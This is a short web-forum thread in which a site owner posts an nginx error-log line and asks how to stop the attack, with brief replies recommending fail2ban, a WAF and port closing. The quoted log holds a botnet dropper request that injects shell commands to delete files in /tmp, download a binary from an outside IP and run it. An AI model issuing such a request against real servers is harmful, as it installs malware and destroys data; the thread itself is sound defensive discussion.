Break my hosting? How to protect based on logs?

D

Dmitry2020-09-11 23:53:13

Nginx

Dmitry, 2020-09-11 23:53:13

Good day!
I saw this line in the logs:

2020/09/11 22:18:18 [error] 1693#1693: *2348 open() "/usr/share/nginx/html/shell" failed (2: No such file or directory), client: 197.56.189.213, server: localhost, request: "GET /shell?cd+/tmp;rm+-rf+*;wget+149.3.170.181/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.1", host: "127.0.0.1:80"

Hacking attempt? How to stop and identify the source?

Reply

Answer the question

In order to leave comments, you need to log in

4 answer(s)

A

algiraid, 2020-09-12
@dfsaraev

As an option - close all unnecessary ports, install antivirus with antimalware. Configure cron to clean up folders that are not needed every 5 seconds. Honeyspot when it detects get requests from new clients. Fail2ban. And regular security audits in paranoia mode.
Z.Y. you're lucky - only one entry. When they tried to hack the site, there were 60 attempts in the hoster's logs. Yandex saw 20 visits.

S

Sergey Gornostaev, 2020-09-12
@sergey-gornostaev

fail2ban

A

Andrey Gavrilov, 2020-09-12
@thexaver

Waf